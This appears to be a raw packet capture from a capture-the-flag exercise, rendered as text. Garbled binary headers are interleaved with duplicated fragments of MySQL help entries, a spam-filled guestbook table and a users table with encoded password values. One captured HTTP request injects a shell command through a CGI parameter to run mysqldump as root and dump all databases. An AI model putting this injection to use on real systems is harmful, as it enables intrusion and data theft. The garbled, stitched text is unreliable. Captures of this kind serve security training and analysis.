against the horrible porn mail in your email box. Please join me in fighting this horrible advertising method that has been on the Internet for years. Remember, \'Together we stand, divided we fall.\' To order my detailed report and provide your help in fighting spam send $15 to the address below and lets all, together, put a stop to spam once and for all. K.C. Smith 10 East Louisiana Evansville, IN 47711 Thank you for your support in this matter. Your friend and best man in fight against spam.',43),(4,'yLd','DEAR RECEIVER, You have just received a Taliban virus. Since we are not so technologicaly advanced in Afghanistan, this is a MANUAL virus. Please delete all the files on your hard disk yourself and send tC ZZBi0`EL@/܂Sŀo0E4\&@?X 3 P{Z"l )\_|C ZZBi0`EL@/܂Sŀo0E4Q@?4. 3 PnɣJe )\C ZZ0`BiEL@/o0  E4\&@@X 3 P{Z"l )\_|C ZZ0`BiEL@/go0AE4Q@@3. 3 PnɣJe )\C  ZZBi0`EL@/܂Sŀo0E4@? 3 PbJ)ϴ )\C% ZZ0`BiEL@/go0AE4@@ 3 PbJ)ϴ )\C! bbBi0`ET@/p܂Ao0E<@?  3PW֞ < )I'mysql> SELECT PERIOD_DIFF(9802,199703);\n -> 11',''),(302,'LIKE',23,' expr LIKE pat [ESCAPE \'escape-char\']\nPattern matching using\nSQL simple regular expression comparison. Returns 1 (TRUE) or 0\n(FALSE). If either expr or pat is NULL, the result is\nNULL.\n\nThe pattern need not be a literal string. For example, it can be specified\nas a string expression or table column.\n\nWith LIKE you can use the following two wildcard characters\nin the pattern:\n\n Character Description\n % Matches any number of characters, even zero characters\n _ Matches exactly one character\n \n','mysql> SELECT \'David!\' LIKE \'David_\';\n -> 1\nmysql> SELECT \'David!\' LIKE \'%D%v%\';\n -> 1',''),(303,'MULTIPOINT',2,' MultiPoint(pt1,pt2,...)\nConstructs a WKB MultiPoint value using WKB Point arguments.\nIf any argument is not a WKB Point, the return value is NULL.\n','',''),(304,'>>',27,' >>\nShifts a longlong (BIGINT) number to the right.\n','mysql> SELECT 4 >> 2;\n -> 1',''),(305,'TRUE FALSE',22,'TRUE and FALSE added as alias for 1 and 0, respectively.\n','',''),(306,'AVG',12,' AVG([DISTINCT] expr)\nReturns the average value of expr.\nThe DISTINCT option can be used as of MySQL 5.0.3 to return the averge\nof the distinct values of C ! mmBi0`E_@/ɂSŀo0EG]@?4  sPį$i LS 67=xHost: 10.0.0.10 C"! bb0`BiET@/Ԁo0SE<@@  3PW֞ < )I'mysql> SELECT PERIOD_DIFF(9802,199703);\n -> 11',''),(302,'LIKE',23,' expr LIKE pat [ESCAPE \'escape-char\']\nPattern matching using\nSQL simple regular expression comparison. Returns 1 (TRUE) or 0\n(FALSE). If either expr or pat is NULL, the result is\nNULL.\n\nThe pattern need not be a literal string. For example, it can be specified\nas a string expression or table column.\n\nWith LIKE you can use the following two wildcard characters\nin the pattern:\n\n Character Description\n % Matches any number of characters, even zero characters\n _ Matches exactly one character\n \n','mysql> SELECT \'David!\' LIKE \'David_\';\n -> 1\nmysql> SELECT \'David!\' LIKE \'%D%v%\';\n -> 1',''),(303,'MULTIPOINT',2,' MultiPoint(pt1,pt2,...)\nConstructs a WKB MultiPoint value using WKB Point arguments.\nIf any argument is not a WKB Point, the return value is NULL.\n','',''),(304,'>>',27,' >>\nShifts a longlong (BIGINT) number to the right.\n','mysql> SELECT 4 >> 2;\n -> 1',''),(305,'TRUE FALSE',22,'TRUE and FALSE added as alias for 1 and 0, respectively.\n','',''),(306,'AVG',12,' AVG([DISTINCT] expr)\nReturns the average value of expr.\nThe DISTINCT option can be used as of MySQL 5.0.3 to return the averge\nof the distinct values of C6! mmʪBiE_@/o0o0oEG]@@4  sPį$i LS 67=xHost: 10.0.0.10 Cq# ZZBiʪEL@/o0oo0E4@@ Ps$i ׀RL 7=x6회C# ZZ0`BiEL@/܀o0SE4@@ Ps$i ׀RL 7=x6회Cd% bbBi0`ET@/p܂Ao0E<@?x  3Ptj  )J',''),(66,'SPACE',23,' SPACE(N)\nReturns a string consisting of N space characters.\n','mysql> SELECT SPACE(6);\n -> \' \'',''),(67,'MBR DEFINITION',8,'Every geometry occupies some position in space. The exterior of\na geometry is all space not occupied by the geometry. The interior\nis the space occupied by the geometry. The boundary is the\ninterface between the geometry\'s interior and exterior.\n\n --- Its MBR (Minimum Bounding Rectangle), or Envelope.\nThis is the bounding geometry, formed by the minimum and maximum (X,Y)\ncoordinates:\n','((MINX MINY, MAXX MINY, MAXX MAXY, MINX MAXY, MINX MINY))',''),(68,'GEOMETRYCOLLECTION',2,' GeometryCollection(g1,g2,...)\nConstructs a WKB GeometryCollection. If any argument is not a\nwell-formed WKB representation of a geometry, the return value is\nNULL.\n','',''),(69,'*',4,' *\nMultiplication:\n','mysql> SELECT 3*5;\n -> 15\nmysql> SELECT 18014398509481984*18014398509481984.0;\n -> 324518553658426726783156020576256.0\nmysql> SELECT 18014398509481984*18014398509481984;\n -> 0',''),(70,'TIMESTAMP',1,' TIMESTAMP[(M)]\n\nA timestamp. The range is \'1970-01-01 00:00:00\' to partway through the\nyear 2037.\n\nA TIMESTAMP column is useful for recording the date and time of an\nINSERT or UC% bb0`BiET@/Ԁo0SE<@@w  3Ptj  )J',''),(66,'SPACE',23,' SPACE(N)\nReturns a string consisting of N space characters.\n','mysql> SELECT SPACE(6);\n -> \' \'',''),(67,'MBR DEFINITION',8,'Every geometry occupies some position in space. The exterior of\na geometry is all space not occupied by the geometry. The interior\nis the space occupied by the geometry. The boundary is the\ninterface between the geometry\'s interior and exterior.\n\n --- Its MBR (Minimum Bounding Rectangle), or Envelope.\nThis is the bounding geometry, formed by the minimum and maximum (X,Y)\ncoordinates:\n','((MINX MINY, MAXX MINY, MAXX MAXY, MINX MAXY, MINX MINY))',''),(68,'GEOMETRYCOLLECTION',2,' GeometryCollection(g1,g2,...)\nConstructs a WKB GeometryCollection. If any argument is not a\nwell-formed WKB representation of a geometry, the return value is\nNULL.\n','',''),(69,'*',4,' *\nMultiplication:\n','mysql> SELECT 3*5;\n -> 15\nmysql> SELECT 18014398509481984*18014398509481984.0;\n -> 324518553658426726783156020576256.0\nmysql> SELECT 18014398509481984*18014398509481984;\n -> 0',''),(70,'TIMESTAMP',1,' TIMESTAMP[(M)]\n\nA timestamp. The range is \'1970-01-01 00:00:00\' to partway through the\nyear 2037.\n\nA TIMESTAMP column is useful for recording the date and time of an\nINSERT or UC) bbBi0`ET@/p܂Ao0E SELECT SUBSTRING(\'Quadratically\',5);\n -> \'ratically\'\nmysql> SELECT SUBSTRING(\'foobarbar\' FROM 4);\n -> \'barbar\'\nmysql> SELECT SUBSTRING(\'Quadratically\',5,6);\n -> \'ratica\'',''),(263,'ISEMPTY',19,' IsEmpty(g)\nReturns 1 if the geometry value g is the empty geometry, 0 if it is not\nempty, and -1 if the argument is NULL.\nIf the geometry is empty, it represents the empty point set.\n','',''),(264,'LTRIM',23,' LTRIM(str)\nReturns the string str with leading space characters removed.\n','mysql> SELECT LTRIM(\' barbar\');\n -> \'barbar\'',''),(265,'REPAIR',7,'REPAIR TABLE repairs a possibly corrupted table.\nBy default,\nit has the same effect as myisamchk --recover tbl_name.\nREPAIR TABLE works only on MyISAM tables.\n','REPAIR [LOCAL | NO_WRITE_TO_BINLOG] TABLE\n tbl_name [, tbl_name] ... [QUICK] [EXTENDED] [USE_FRM]',''),(266,'INTERSECTS',11,'CI. bb0`BiET@/Ԁo0SE SELECT SUBSTRING(\'Quadratically\',5);\n -> \'ratically\'\nmysql> SELECT SUBSTRING(\'foobarbar\' FROM 4);\n -> \'barbar\'\nmysql> SELECT SUBSTRING(\'Quadratically\',5,6);\n -> \'ratica\'',''),(263,'ISEMPTY',19,' IsEmpty(g)\nReturns 1 if the geometry value g is the empty geometry, 0 if it is not\nempty, and -1 if the argument is NULL.\nIf the geometry is empty, it represents the empty point set.\n','',''),(264,'LTRIM',23,' LTRIM(str)\nReturns the string str with leading space characters removed.\n','mysql> SELECT LTRIM(\' barbar\');\n -> \'barbar\'',''),(265,'REPAIR',7,'REPAIR TABLE repairs a possibly corrupted table.\nBy default,\nit has the same effect as myisamchk --recover tbl_name.\nREPAIR TABLE works only on MyISAM tables.\n','REPAIR [LOCAL | NO_WRITE_TO_BINLOG] TABLE\n tbl_name [, tbl_name] ... [QUICK] [EXTENDED] [USE_FRM]',''),(266,'INTERSECTS',11,'C3 bbBi0`ET@/p܂Ao0E SELECT SUBSTRING_INDEX(\'www.mysql.com\', \'.\', 2);\n -> \'www.mysql\'\nmysql> SELECT SUBSTRING_INDEX(\'www.mysql.com\', \'.\', -2);\n -> \'mysql.com\'',''),(269,'ENCODE',17,' ENCODE(str,pass_str)\nEncrypt str using pass_str as the password.\nTo decrypt the result, use DECODE().\n\nThe result is a binary string of the same length as str.\nIf you want to save it in a column, use a BLOB column type.\n','',''),(270,'TRUNCATE',4,' TRUNCATE(X,D)\nReturns the number X, truncated to D decimals. If D\nis 0, the result has no decimal point or fractional part.\nD can be negative to truncate (C)3 bb0`BiET@/Ԁo0SE SELECT SUBSTRING_INDEX(\'www.mysql.com\', \'.\', 2);\n -> \'www.mysql\'\nmysql> SELECT SUBSTRING_INDEX(\'www.mysql.com\', \'.\', -2);\n -> \'mysql.com\'',''),(269,'ENCODE',17,' ENCODE(str,pass_str)\nEncrypt str using pass_str as the password.\nTo decrypt the result, use DECODE().\n\nThe result is a binary string of the same length as str.\nIf you want to save it in a column, use a BLOB column type.\n','',''),(270,'TRUNCATE',4,' TRUNCATE(X,D)\nReturns the number X, truncated to D decimals. If D\nis 0, the result has no decimal point or fractional part.\nD can be negative to truncate (C3 bbBi0`ET@/أ  o0E< @?|  3PZ{  `+)%his mail to everyone you know. Thank you very much for helping us. -Taliban hacker.',60),(5,'Joy Adams','My name is Joy Adams, I have well trained capuchin monkeys for sale at a very good CONSIDERABLE PRICE. I will also help you in getting the documents of your baby monkeys. Please contact me/my husband for more information. Thanks, Joy Adams',77); UNLOCK TABLES; /*!40000 ALTER TABLE `entries` ENABLE KEYS */; -- -- Table structure for table `users` -- DROP TABLE IF EXISTS `users`; CREATE TABLE `users` ( `id` int(11) NOT NULL auto_increment, `email` varchar(128) default NULL, `password` varchar(128) default NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; -- -- Dumping data for table `users` -- /*!40000 ALTER TABLE `users` DISABLE KEYS */; LOCK TABLES `users` WRITE; INSERT INTO `users` VALUES (210,'plezbf','MTNzEwEIABJGrzhHYK2I6hQVhmPMOAVp5DBVoQ=='),(211,'aatjas','MTNzEwEIABNVSIY5GkviLY+1YBdgCbCIFRDz3w=='),(212,'alncgb','MTNzEwEIABThHerXg6GSizIqIWelQ81d9QHGAg=='),(213,'wgqpra','MTNzExEIADEIwg0fvPMna2padbpVymt1BdDPzg=='),(214,'aqrqen','MTNzExEIADKmkxEEmYS4NCyXp/AfQclQJxTtJw=='),(215,'mtpfzz','MTNzExEIADPtmuVfNOLY827/spJbC8/haf74zA=='),(216,'yedjtc','MTNzExEIADS8r5oV4MrZpAm8D/O2Cs6303+Clg=='),(217,'vdinci','MTNzExEIADVFKaDWv8XoIjQBKLXn+C3 ZZBi0`EL@/܂Sŀo0E4\(@?V 3 P{Z"l )]_C3 bb0`BiET@/Ԁo0SE< @@|  3PZ{  `+)%his mail to everyone you know. Thank you very much for helping us. -Taliban hacker.',60),(5,'Joy Adams','My name is Joy Adams, I have well trained capuchin monkeys for sale at a very good CONSIDERABLE PRICE. I will also help you in getting the documents of your baby monkeys. Please contact me/my husband for more information. Thanks, Joy Adams',77); UNLOCK TABLES; /*!40000 ALTER TABLE `entries` ENABLE KEYS */; -- -- Table structure for table `users` -- DROP TABLE IF EXISTS `users`; CREATE TABLE `users` ( `id` int(11) NOT NULL auto_increment, `email` varchar(128) default NULL, `password` varchar(128) default NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; -- -- Dumping data for table `users` -- /*!40000 ALTER TABLE `users` DISABLE KEYS */; LOCK TABLES `users` WRITE; INSERT INTO `users` VALUES (210,'plezbf','MTNzEwEIABJGrzhHYK2I6hQVhmPMOAVp5DBVoQ=='),(211,'aatjas','MTNzEwEIABNVSIY5GkviLY+1YBdgCbCIFRDz3w=='),(212,'alncgb','MTNzEwEIABThHerXg6GSizIqIWelQ81d9QHGAg=='),(213,'wgqpra','MTNzExEIADEIwg0fvPMna2padbpVymt1BdDPzg=='),(214,'aqrqen','MTNzExEIADKmkxEEmYS4NCyXp/AfQclQJxTtJw=='),(215,'mtpfzz','MTNzExEIADPtmuVfNOLY827/spJbC8/haf74zA=='),(216,'yedjtc','MTNzExEIADS8r5oV4MrZpAm8D/O2Cs6303+Clg=='),(217,'vdinci','MTNzExEIADVFKaDWv8XoIjQBKLXn+C3 ZZ0`BiEL@/o0  E4\(@@V 3 P{Z"l )]_Cr7 bbBi0`ET@/p܂Ao0E SELECT TRUNCATE(1.223,1);\n -> 1.2\nmysql> SELECT TRUNCATE(1.999,1);\n -> 1.9\nmysql> SELECT TRUNCATE(1.999,0);\n -> 1\nmysql> SELECT TRUNCATE(-1.999,1);\n -> -1.9\nmysql> SELECT TRUNCATE(122,-2);\n -> 100',''),(271,'TIMESTAMPADD',14,' TIMESTAMPADD(interval,int_expr,datetime_expr)\n\nAdds the integer expression int_expr to the date or datetime expression\ndatetime_expr. The unit for int_expr is given by the\ninterval argument, which should be one of the following values:\nFRAC_SECOND,\nSECOND,\nMINUTE,\nHOUR,\nDAY,\nWEEK,\nMONTH,\nQUARTER,\nor\nYEAR.\n\nThe interval value may be specified using one of keywords as shown,\nor with a prefix of SQL_TSI_. For example, DAY or\nSQL_TSI_DAY both are legal.\n','',''),(272,'SHOW',6,'\nSHOW has many forms that provide information about databases,\ntables, columns, or status information about the server.\nThis section describes those following:\n\nSHOW [FULL] COLUMNS FROM tbl_name [FROM db_name] [LIKE \'pattern\']\nSHOW CREATE DATABASE db_name\nSHOW CREATE TABLE tbl_name\nSHOW DATABASES [LIKE \'pattern\']\nSHOW ENGINE engine_name {LOGS | STATUS }\nSHOW [STORAGE] ENGINES\nSHOW ERRORS [LIMIT [offset,] row_count]\nSHOW GRANTC7 bb0`BiET@/Ԁo0SE SELECT TRUNCATE(1.223,1);\n -> 1.2\nmysql> SELECT TRUNCATE(1.999,1);\n -> 1.9\nmysql> SELECT TRUNCATE(1.999,0);\n -> 1\nmysql> SELECT TRUNCATE(-1.999,1);\n -> -1.9\nmysql> SELECT TRUNCATE(122,-2);\n -> 100',''),(271,'TIMESTAMPADD',14,' TIMESTAMPADD(interval,int_expr,datetime_expr)\n\nAdds the integer expression int_expr to the date or datetime expression\ndatetime_expr. The unit for int_expr is given by the\ninterval argument, which should be one of the following values:\nFRAC_SECOND,\nSECOND,\nMINUTE,\nHOUR,\nDAY,\nWEEK,\nMONTH,\nQUARTER,\nor\nYEAR.\n\nThe interval value may be specified using one of keywords as shown,\nor with a prefix of SQL_TSI_. For example, DAY or\nSQL_TSI_DAY both are legal.\n','',''),(272,'SHOW',6,'\nSHOW has many forms that provide information about databases,\ntables, columns, or status information about the server.\nThis section describes those following:\n\nSHOW [FULL] COLUMNS FROM tbl_name [FROM db_name] [LIKE \'pattern\']\nSHOW CREATE DATABASE db_name\nSHOW CREATE TABLE tbl_name\nSHOW DATABASES [LIKE \'pattern\']\nSHOW ENGINE engine_name {LOGS | STATUS }\nSHOW [STORAGE] ENGINES\nSHOW ERRORS [LIMIT [offset,] row_count]\nSHOW GRANTC; bbBi0`ET@/p܂Ao0E SELECT GREATEST(2,0);\n -> 2\nmysql> SELECT GREATEST(34.0,3.0,5.0,767.0);\n -> 767.0\nmysql> SELECT GREATEST(\'B\',\'A\',\'C\');\n -> \'C\'',''),(274,'OCTETLENGTH',23,' OCTET_LENC; ZZBi0`EL@/Ao0E4@?  ֞Pg%߀"l dmVC; bb0`BiET@/Ԁo0SE SELECT GREATEST(2,0);\n -> 2\nmysql> SELECT GREATEST(34.0,3.0,5.0,767.0);\n -> 767.0\nmysql> SELECT GREATEST(\'B\',\'A\',\'C\');\n -> \'C\'',''),(274,'OCTETLENGTH',23,' OCTET_LENC < ZZ0`BiEL@/o0˃2E4@@  ֞Pg%߀"l dmVC= ""Bi0`E@/Sŀo0ES@?3d 3 Pnɣ )^GET /~museum/cgi-bin/museum_admin.pl?first=a&last=a%3B+mysqldump+-uroot+-pctftest+--all-databases&password=sad HTTP/1.0 User-Agent: Wget/1.10 Accept: */* Host: 10.12.1.3 Connection: Keep-Alive C= ""0`BiE@/go0AES@@2d 3 Pnɣ )^GET /~museum/cgi-bin/museum_admin.pl?first=a&last=a%3B+mysqldump+-uroot+-pctftest+--all-databases&password=sad HTTP/1.0 User-Agent: Wget/1.10 Accept: */* Host: 10.12.1.3 Connection: Keep-Alive C;@ bbBi0`ET@/p܂Ao0E SELECT SECOND(\'10:05:03\');\n -> 3',''),(276,'BIT_AND',12,' BIT_AND(expr)\nReturns the bitwise AND of all bits in expr. The calculation is\nperformed with 64-bit (BIGINT) precision.\n','mysql> SELECT order.custid, customer.name, MAX(payments)\n -> FROM order,customer\n -> WHERE order.custid = customer.custid\n -> GROUP BY order.custid;',''),(277,'ATAN2',4,' ATAN(Y,X)\n ATAN2(Y,X)\nReturns the arc tangent of the two variables X and Y. It is\nsimilar to calculating the arc tangent of Y / X, except that the\nsigns of both arguments are used to determine the quadrant of the\nresult.\n','mysql> SELECT ATAN(-2,2);\n -> -0.785398\nmysql> SELECT ATAN2(PI(),0);\n -> 1.570796',''),(278,'MBRCONTAINS',8,' MBRContains(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangle of\ng1 contains the Minimum Bounding Rectangle of g2.\n','mysql> SET @g1 = GeomFromText(\'Polygon((0 0,0 3,3 3,3 0,0 0))\');\nmysql> SET @g2 = GeomFromText(\'Point(1 1)\');\nmysql> SELECT MBRContains(@g1,@g2), MBRContains(@g2,@g1);\n----------------------+---------------CV@ bb0`BiET@/Ԁo0SE SELECT SECOND(\'10:05:03\');\n -> 3',''),(276,'BIT_AND',12,' BIT_AND(expr)\nReturns the bitwise AND of all bits in expr. The calculation is\nperformed with 64-bit (BIGINT) precision.\n','mysql> SELECT order.custid, customer.name, MAX(payments)\n -> FROM order,customer\n -> WHERE order.custid = customer.custid\n -> GROUP BY order.custid;',''),(277,'ATAN2',4,' ATAN(Y,X)\n ATAN2(Y,X)\nReturns the arc tangent of the two variables X and Y. It is\nsimilar to calculating the arc tangent of Y / X, except that the\nsigns of both arguments are used to determine the quadrant of the\nresult.\n','mysql> SELECT ATAN(-2,2);\n -> -0.785398\nmysql> SELECT ATAN2(PI(),0);\n -> 1.570796',''),(278,'MBRCONTAINS',8,' MBRContains(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangle of\ng1 contains the Minimum Bounding Rectangle of g2.\n','mysql> SET @g1 = GeomFromText(\'Polygon((0 0,0 3,3 3,3 0,0 0))\');\nmysql> SET @g2 = GeomFromText(\'Point(1 1)\');\nmysql> SELECT MBRContains(@g1,@g2), MBRContains(@g2,@g1);\n----------------------+---------------CE bbBi0`ET@/p܂Ao0E SELECT HOUR(\'10:05:03\');\n -> 10',''),(280,'TYPE SET',1,' SET(\'value1\',\'value2\',...)\n\nA set. A string object that can have zero or more values, each of which must\nbe chosen from the list of values \'value1\', \'value2\',\n... A SET column can have a maximum of 64 members.\nSET values are represented internally as integers.\n \n','',''),(281,'SELECT',6,'SELECT is used to retrieve rows selected from one or more tables.\nSupport for UNION statements and subqueries is available as of MySQL\n4.0 and 4.1, respectively.\nSee [UNION, , UNION] and [Subqueries].\n\n --- Each select_expr indicates a column you want to retrieve.\n\n --- table_references indicates the table or tables from which to retrieve rows.\nIts syntax is described in [JOIN, , JOIN].\n\n --- where_definition consists of the keyword WHERE followed by\nan expression that indicates the condition or conditions that rows\nmust satisfy to be selected.\n\nC&E ZZBi0`EL@/Ao0E4@?  ֞Pg%"lż dmiC-E ZZBi0`EL@/< o0E4 @?!  gPa8Z~ -_fCEE bb0`BiET@/Ԁo0SE SELECT HOUR(\'10:05:03\');\n -> 10',''),(280,'TYPE SET',1,' SET(\'value1\',\'value2\',...)\n\nA set. A string object that can have zero or more values, each of which must\nbe chosen from the list of values \'value1\', \'value2\',\n... A SET column can have a maximum of 64 members.\nSET values are represented internally as integers.\n \n','',''),(281,'SELECT',6,'SELECT is used to retrieve rows selected from one or more tables.\nSupport for UNION statements and subqueries is available as of MySQL\n4.0 and 4.1, respectively.\nSee [UNION, , UNION] and [Subqueries].\n\n --- Each select_expr indicates a column you want to retrieve.\n\n --- table_references indicates the table or tables from which to retrieve rows.\nIts syntax is described in [JOIN, , JOIN].\n\n --- where_definition consists of the keyword WHERE followed by\nan expression that indicates the condition or conditions that rows\nmust satisfy to be selected.\n\nCWE ZZ0`BiEL@/o0˃2E4@@  ֞Pg%"lż dmiChE ZZ0`BiEL@/o0  E4 @@!  gPa8Z~ -_fCI bbBi0`ET@/p܂Ao0E SELECT COT(12);\n -> -1.57267341\nmysql> SELECT COT(0);\n -> NULL',''),(283,'BACKUP TABLE',7,'Note: This statement is deprecated. We are working on a better\nreplacement for it that will provide online backup capabilities.\nIn the meantime, the mysqlhotcopy script can be used instead.\n\nBACKUP TABLE copies to the backup directory the minimum number of\ntable files needed to restore theCI bb0`BiET@/Ԁo0SE SELECT COT(12);\n -> -1.57267341\nmysql> SELECT COT(0);\n -> NULL',''),(283,'BACKUP TABLE',7,'Note: This statement is deprecated. We are working on a better\nreplacement for it that will provide online backup capabilities.\nIn the meantime, the mysqlhotcopy script can be used instead.\n\nBACKUP TABLE copies to the backup directory the minimum number of\ntable files needed to restore theCI bbBi0`ET@/أ  o0E<@?  PgZ a8 2f `+E and comparison\nis based on numeric byte values.\n\nFrom MySQL 4.1.0 on, column type CHAR BYTE is an alias for\nCHAR BINARY. This is a compatibility feature.\n\nFrom MySQL 4.1.0 on, the ASCII attribute can be specified for\nCHAR. It assigns the latin1 character set.\n\nFrom MySQL 4.1.1 on, the UNICODE attribute can be specified for\nCHAR. It assigns the ucs2 character set.\n\nMySQL allows you to create a column of type CHAR(0). This is mainly\nuseful when you have to be compliant with some old applications that depend\non the existence of a column but that do not actually use the value. This\nis also quite nice when you need a column that can take only two values: A\nCHAR(0) column that is not defined as NOT NULL occupies only\none bit and can take only the values NULL and \'\' (the empty\nstring).\n\n CHAR\nThis is a synonym for CHAR(1).\n','',''),(338,'UTC_DATE',14,' UTC_DATE\n UTC_DATE()\nReturns the current UTC date as a value in \'YYYY-MM-DD\' or\nYYYYMMDD format, depending on whether the function is used in a\nstring or numeric context.\n','mysql> SELECT UTC_DATE(), UTC_DATE() + 0;\n -> \'2003-08-14\', 20030814',''),(339,'DIMENSION',19,' Dimension(g)\nReturns the inherent dimension of the geometry value g. The result\ncan be -1, 0, 1, or 2. (TheCI bb0`BiET@/4o0 E<@@  PgZ a8 2f `+E and comparison\nis based on numeric byte values.\n\nFrom MySQL 4.1.0 on, column type CHAR BYTE is an alias for\nCHAR BINARY. This is a compatibility feature.\n\nFrom MySQL 4.1.0 on, the ASCII attribute can be specified for\nCHAR. It assigns the latin1 character set.\n\nFrom MySQL 4.1.1 on, the UNICODE attribute can be specified for\nCHAR. It assigns the ucs2 character set.\n\nMySQL allows you to create a column of type CHAR(0). This is mainly\nuseful when you have to be compliant with some old applications that depend\non the existence of a column but that do not actually use the value. This\nis also quite nice when you need a column that can take only two values: A\nCHAR(0) column that is not defined as NOT NULL occupies only\none bit and can take only the values NULL and \'\' (the empty\nstring).\n\n CHAR\nThis is a synonym for CHAR(1).\n','',''),(338,'UTC_DATE',14,' UTC_DATE\n UTC_DATE()\nReturns the current UTC date as a value in \'YYYY-MM-DD\' or\nYYYYMMDD format, depending on whether the function is used in a\nstring or numeric context.\n','mysql> SELECT UTC_DATE(), UTC_DATE() + 0;\n -> \'2003-08-14\', 20030814',''),(339,'DIMENSION',19,' Dimension(g)\nReturns the inherent dimension of the geometry value g. The result\ncan be -1, 0, 1, or 2. (TheChM bbBi0`ET@/p܂Ao0E UPDATE tbl_name\n SET blob_column=LOAD_FILE(\'/tmp/picture\')\n WHERE id=1;',''),(285,'POINTFROMTEXT',3,' PointFromText(wkt[,srid])\nConstructs a POINT value using its WKT representation and SRID.\n','',''),(286,'LOAD TABLE FROM MASTER',6,'LOAD TABLE tbl_name FROM MASTER\n\nTransfers a copy of the table from master to the slave. This statement is\nimplemented mainly for debugging of LOAD DATA FROM MASTER.\nIt requires that the account used for connectingCM bb0`BiET@/Ԁo0SE UPDATE tbl_name\n SET blob_column=LOAD_FILE(\'/tmp/picture\')\n WHERE id=1;',''),(285,'POINTFROMTEXT',3,' PointFromText(wkt[,srid])\nConstructs a POINT value using its WKT representation and SRID.\n','',''),(286,'LOAD TABLE FROM MASTER',6,'LOAD TABLE tbl_name FROM MASTER\n\nTransfers a copy of the table from master to the slave. This statement is\nimplemented mainly for debugging of LOAD DATA FROM MASTER.\nIt requires that the account used for connectingCaN ZZBi0`EL@/Ao0E4@?  ֞Pg%"l dmmCzN ZZ0`BiEL@/o0˃2E4@@  ֞Pg%"l dmmCQ bbBi0`ET@/p܂Ao0E SELECT student_name,\n -> GROUP_CONCAT(test_score)\n -> FROM student\n -> GROUP BY student_name;',''),(288,'DATE_FORMAT',14,' DATE_FORMAT(date,format)\nFormats the date value according to the format string. The\nfollowing specifiers may be used in the format string:\n\n Specifier Description\n %a Abbreviated weekday name (Sun..Sat)\n %b Abbreviated month name (Jan..Dec)\n %c Month,CQ ZZBi0`EL@/Ao0E4@?  ֞Pg%^"lE dmmCQ bb0`BiET@/Ԁo0SE SELECT student_name,\n -> GROUP_CONCAT(test_score)\n -> FROM student\n -> GROUP BY student_name;',''),(288,'DATE_FORMAT',14,' DATE_FORMAT(date,format)\nFormats the date value according to the format string. The\nfollowing specifiers may be used in the format string:\n\n Specifier Description\n %a Abbreviated weekday name (Sun..Sat)\n %b Abbreviated month name (Jan..Dec)\n %c Month,CQ ZZ0`BiEL@/o0˃2E4@@  ֞Pg%^"lE dmmCR NNBi0`E@@/Jƒxǀo0E(JP@a  Pu4uPCR NNBi0`E@@/Jƒxǀo0E(@  P*!^IP& CR NNʪBiE@@/#o0o0oE(JP@@a  Pu4uPCR NNʪBiE@@/#o0o0oE(@@  P*!^IP& C2V bbBi0`ET@/p܂Ao0E€o0xE(L@@ Pٮ4uwPCZ bbBi0`ET@/p܂Ao0E SELECT DATE_FORMAT(\'1997-10-04 22:23:00\', \'%W %M %Y\');\n -> \'Saturday October 1997\'\nmysql> SELECT DATE_FORMAT(\'1997-10-04 22:23:00\', \'%H:%i:%s\');\n -> \'22:23:00\'\nmysql> SELECT DATE_FORMAT(\'1997-10-04 22:23:00\',\n \'%D %y %a %d %m %b %j\');\n -> \'4th 97 Sat 04 10 Oct 277\'\nmysql> SELECT DATE_FORMAT(\'1997-10-04 22:23:00\',\n \'%H %k %I %r %T %S %w\');\n -> \'22 22 10 10:23:00 PM 22:23:00 00 6\'\nmysql> SELECT DATE_FORMAT(\'1999-01-01\', \'%X %V\');\n -> \'1998 52\'',''),(289,'BENCHMARK',25,' BENCHMARK(count,expr)\nThe BENCHMARK() function executes the expression expr\nrepeatedly count times. It may be used to time how fast MySQL\nprocCZ bb0`BiET@/Ԁo0SE SELECT DATE_FORMAT(\'1997-10-04 22:23:00\', \'%W %M %Y\');\n -> \'Saturday October 1997\'\nmysql> SELECT DATE_FORMAT(\'1997-10-04 22:23:00\', \'%H:%i:%s\');\n -> \'22:23:00\'\nmysql> SELECT DATE_FORMAT(\'1997-10-04 22:23:00\',\n \'%D %y %a %d %m %b %j\');\n -> \'4th 97 Sat 04 10 Oct 277\'\nmysql> SELECT DATE_FORMAT(\'1997-10-04 22:23:00\',\n \'%H %k %I %r %T %S %w\');\n -> \'22 22 10 10:23:00 PM 22:23:00 00 6\'\nmysql> SELECT DATE_FORMAT(\'1999-01-01\', \'%X %V\');\n -> \'1998 52\'',''),(289,'BENCHMARK',25,' BENCHMARK(count,expr)\nThe BENCHMARK() function executes the expression expr\nrepeatedly count times. It may be used to time how fast MySQL\nprocC \ ZZBi0`EL@/Ao0E4@?  ֞Pg%n"l0 dmpC%\ ZZ0`BiEL@/o0˃2E4@@  ֞Pg%n"l0 dmpC^ bbBi0`ET@/أ  o0E<@?  PgZ%a8  `+E meaning of these values is given in\n[GIS class geometry].)\n','mysql> SELECT Dimension(GeomFromText(\'LineString(1 1,2 2)\'));\n+------------------------------------------------+\n| Dimension(GeomFromText(\'LineString(1 1,2 2)\')) |\n+------------------------------------------------+\n| 1 |\n+------------------------------------------------+',''),(340,'COUNT DISTINCT',12,' COUNT(DISTINCT expr,[expr...])\nReturns a count of the number of different non-NULL values.\n','mysql> SELECT COUNT(DISTINCT results) FROM student;',''),(341,'BIT',1,' BIT[(M)]\n\nA bit-field type. M indicates the number of bits per value, from 1 to\n64. The default is 1 if M is omitted.\n\nThis data type was added in MySQL 5.0.3 for MyISAM, and extended\nin 5.0.5 to MEMORY, InnoDB, and BDB. Before 5.0.3,\nBIT is a synonym for TINYINT(1).\n','',''),(342,'EQUALS',11,' Equals(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 is spatially equal to\ng2.\n','',''),(343,'SHOW CREATE VIEW',24,'This statement shows a CREATE VIEW statement that creates\nthe given view.\n','SHOW CREATE VIEW view_name',''),(344,'INTERVAL',26,' INTERVAL(N,N1,N2,N3,...)\nReturns 0 if N < N1, 1 if N < N2\nand so on or -1 if N is NULL. All arguments are treated\nas integerC_ bb0`BiET@/4o0 E<@@  PgZ%a8  `+E meaning of these values is given in\n[GIS class geometry].)\n','mysql> SELECT Dimension(GeomFromText(\'LineString(1 1,2 2)\'));\n+------------------------------------------------+\n| 